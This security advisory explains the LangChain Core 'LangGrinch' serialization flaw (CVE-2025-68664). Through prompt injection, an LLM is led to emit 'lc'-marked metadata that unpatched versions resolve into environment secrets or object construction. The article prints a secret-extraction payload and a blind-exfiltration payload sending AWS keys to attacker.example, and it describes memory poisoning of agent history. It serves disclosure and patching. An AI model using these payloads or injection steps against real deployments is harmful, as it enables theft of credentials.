
On December 24, 2025, security researcher Yarden Porat disclosed CVE-2025-68664 (“LangGrinch”), a critical serialization injection vulnerability in LangChain Core with a CVSS score of 9.3/10. The vulnerability enables attackers to extract secrets and execute code via prompt injection by exploiting how LangChain’s dumps() and dumpd() functions handle dictionaries containing the ‘lc’ marker key. With LangChain Core at 847 million total downloads and powering thousands of production AI agents, this vulnerability exposes a fundamental security gap: AI frameworks are trusting LLM outputs as if they’re benign internal data, when they’re actually untrusted user inputs.
The vulnerability was patched within weeks, but it reveals a systemic problem in AI development. LangChain prioritized developer convenience (secrets loaded automatically by default) over security boundaries. This pattern is repeating across the AI industry, and developers building AI agents need to understand the trade-offs before production deployments.
How the ‘lc’ Marker Exploit Works
LangChain uses an ‘lc’ marker key internally to identify serialized objects during dumps/loads operations. The vulnerability exists because the dumps() and dumpd() functions didn’t escape user-controlled dictionaries containing this marker. When LLM outputs (which can be manipulated via prompt injection) include this structure, the deserializer treats them as legitimate LangChain objects rather than untrusted user data.
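For orientation, here is a minimal sketch of that envelope on a benign object (the message content is purely illustrative):
# Minimal sketch: the 'lc' envelope that identifies serialized LangChain objects
from langchain_core.load import dumpd
from langchain_core.messages import AIMessage
envelope = dumpd(AIMessage(content="hello"))
print(envelope["lc"])    # 1 -- the marker loads() looks for
print(envelope["type"])  # "constructor" -- tells the loader which class to rebuild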
Yarden Porat explained: “What makes this finding interesting is that the vulnerability lives in the serialization path, not the deserialization path. In agent frameworks, structured data produced downstream of a prompt is often persisted, streamed and reconstructed later. That creates a surprisingly large attack surface reachable from a single prompt.”
The most common attack vector involves LLM response fields such as additional_kwargs or response_metadata. Attackers craft prompts that cause the LLM to emit metadata containing the ‘lc’ marker structure. When that data is serialized and later deserialized, for example during streaming operations, the injected payload is reconstructed. Crucially, the flaw sits not in the deserialization code (which is often hardened) but in the serialization path, an often-overlooked attack surface.
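A hedged sketch of that round trip, assuming a pre-patch langchain-core and with the persistence step reduced to a single variable (the variable names are ours, not from the disclosure):
# Sketch of the vulnerable round trip on a pre-patch langchain-core (illustrative only)
from langchain_core.load import dumps, loads
from langchain_core.messages import AIMessage
# Metadata shaped by a prompt-injected LLM response; additional_kwargs is a real field,
# the payload is the 'lc'-marked structure described above.
tainted = AIMessage(
    content="...",
    additional_kwargs={"lc": 1, "type": "secret", "id": ["OPENAI_API_KEY"]},
)
blob = dumps(tainted)   # serialization path: pre-patch, the marker was not escaped
restored = loads(blob)  # pre-patch default secrets_from_env=True resolved the secret
                        # from the environment (assuming OPENAI_API_KEY is set)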
The Convenience Trap: Insecure Defaults
The most dangerous aspect of this vulnerability was the default setting secrets_from_env=True, which automatically loaded secrets from environment variables during deserialization. This design choice prioritized developer convenience (“just works”) over security boundaries. Attackers could inject a simple payload to extract API keys:
{"lc": 1, "type": "secret", "id": ["OPENAI_API_KEY"]}
When deserialized, this structure automatically resolved to the value of the OPENAI_API_KEY environment variable and exposed it to the attacker. The patch changed this default to False, introducing breaking changes for teams relying on automatic secret loading.
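A sketch of what that resolution looked like on a pre-patch release (assuming the environment variable is set; this is not the researcher’s proof of concept):
# Pre-patch behavior sketch: deserializing the payload above resolved the secret automatically
from langchain_core.load import loads
payload = '{"lc": 1, "type": "secret", "id": ["OPENAI_API_KEY"]}'
leaked = loads(payload)  # pre-patch default secrets_from_env=True returned the env var's value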
This reflects a pattern across the AI industry: frameworks optimize for “getting started in 5 minutes” at the expense of security fundamentals. The convenience-first approach works until it doesn’t, and at 847 million downloads the blast radius is massive. LangChain reached a $1.1 billion valuation before addressing this fundamental security boundary.
Massive Scope: 847M Downloads Affected
LangChain Core has 847 million total downloads and 98 million monthly downloads as of late December 2025. The framework is used by 1,306 verified companies including Klarna, Snowflake, Boston Consulting Group, and Microsoft, with 132,000+ LLM applications built on it. The vulnerability affects Python versions prior to 0.3.81 and versions 1.0.0 through 1.2.4, plus JavaScript versions prior to 0.3.29.
Additionally, security researchers identified 12 distinct vulnerable code flows across common use cases: event streaming, logging, message history/memory, and caches. The LangChain team awarded a $4,000 bug bounty – the maximum in the project’s history – recognizing the severity and thoroughness of Porat’s disclosure.
This isn’t a niche library – it’s foundational infrastructure for AI agents across enterprises. Every company running LangChain agents needed to audit and patch immediately. The combination of widespread adoption, critical vulnerability, and convenient defaults created massive potential for exploitation.
Beyond Secret Extraction: Blind Attacks and Memory Poisoning
The vulnerability enables attacks beyond simple secret extraction. Blind exfiltration attacks leverage the ChatBedrockConverse class from langchain_aws, which performs a network GET request immediately upon construction. Attackers control the endpoint URL and populate HTTP headers with values drawn from environment variables. The attacker never needs to see the LLM response; they simply stand up a server and wait for the HTTP request to arrive with the secrets in its headers.
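The injected structure for such an attack would look roughly like the sketch below. The envelope shape ("type": "constructor" plus a class path and kwargs) follows LangChain’s serialization scheme, but the module path and keyword-argument names here are illustrative assumptions, not the payload from the disclosure:
# Illustrative constructor-style payload (module path and kwarg names are assumptions)
blind_exfil_payload = {
    "lc": 1,
    "type": "constructor",  # tells the loader to instantiate a class
    "id": ["langchain_aws", "chat_models", "ChatBedrockConverse"],  # path is illustrative
    "kwargs": {
        # hypothetical parameter names: an attacker-controlled endpoint plus headers that
        # embed secret references, which a pre-patch loader resolved from os.environ
        "endpoint_url": "https://attacker.example/collect",
        "extra_headers": {
            "x-leak": {"lc": 1, "type": "secret", "id": ["AWS_SECRET_ACCESS_KEY"]},
        },
    },
}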
Conversation memory poisoning presents another attack vector: attackers inject malicious serialized objects into an agent’s conversation history, and the payload triggers the next time that history is loaded. These attacks are not theoretical; they are practical exploitation patterns that security researchers documented. Blind exfiltration is particularly dangerous because traditional output monitoring won’t catch it.
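A minimal sketch of the round trip that makes memory poisoning possible, assuming a history store that persists messages with dumpd() and revives them with load() (the store and function names are hypothetical):
# Sketch: a chat-history store that round-trips messages through LangChain serialization
from langchain_core.load import dumpd, load
from langchain_core.messages import HumanMessage
history_rows = []  # stands in for whatever database or file the agent uses
def save_turn(message):
    # Persist the message; pre-patch, attacker-shaped 'lc' dicts inside its fields
    # were stored verbatim instead of being escaped.
    history_rows.append(dumpd(message))
def restore_history():
    # On the next session the rows are revived; pre-patch, any injected 'lc' structure
    # was treated as a real object (or secret reference) and resolved here.
    return [load(row) for row in history_rows]
save_turn(HumanMessage(content="hello"))
messages = restore_history()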
Patch Now: Immediate Actions Required
Patches are available in langchain-core 1.2.5+ and 0.3.81+ (Python), and @langchain/core 0.3.29+ (JavaScript). The fix introduces new restrictive defaults:
from langchain_core.load import loads
# BEFORE patch (VULNERABLE): secrets resolved from the environment by default
data = loads(serialized_data, secrets_from_env=True)   # default was True
# AFTER patch (SECURE): restrictive defaults
data = loads(serialized_data, secrets_from_env=False)  # default is now False
data = loads(serialized_data, allowed_objects=["specific.classes"])  # explicit allowlist
Organizations must take immediate action. First, update to patched versions. Second, audit all serialization and deserialization code paths in your LangChain deployments. Third, review environment variable handling and ensure secrets_from_env is disabled. Fourth, implement least-privilege access controls for AI agents. Fifth, treat all LLM outputs as untrusted user inputs requiring validation. Read the full security advisory for complete patch guidance.
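On the last point, a minimal sketch of one possible validation step (this is not a LangChain API, and the function names are ours): reject LLM-provided fields that already carry the ‘lc’ envelope before they ever reach a serializer.
# Illustrative defense-in-depth check (not a LangChain API): reject LLM-provided
# structures that already look like serialization envelopes before persisting them.
def contains_lc_marker(value):
    """Recursively detect dicts shaped like LangChain serialization envelopes."""
    if isinstance(value, dict):
        if "lc" in value:
            return True
        return any(contains_lc_marker(v) for v in value.values())
    if isinstance(value, (list, tuple)):
        return any(contains_lc_marker(v) for v in value)
    return False
def assert_untainted(llm_metadata):
    # llm_metadata is a hypothetical name for fields such as additional_kwargs or
    # response_metadata coming back from the model.
    if contains_lc_marker(llm_metadata):
        raise ValueError("LLM output contains an 'lc' serialization marker; refusing to persist it")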
Key Takeaways
- Update immediately to langchain-core 1.2.5+/0.3.81+ or @langchain/core 0.3.29+ – this is a critical patch for production AI agents
- Audit serialization flows – review all dumps/loads operations, especially in streaming, logging, memory, and cache code paths
- Disable secrets_from_env – if not already disabled by the patch, explicitly set it to False and implement secure secret management
- Treat LLM outputs as untrusted – AI frameworks must recognize that LLM-generated data is user input requiring the same validation as external data
- Challenge convenience-first design – the AI industry’s “ship fast” mentality created a $1.1B company with fundamental security gaps; security must be prioritized from day one











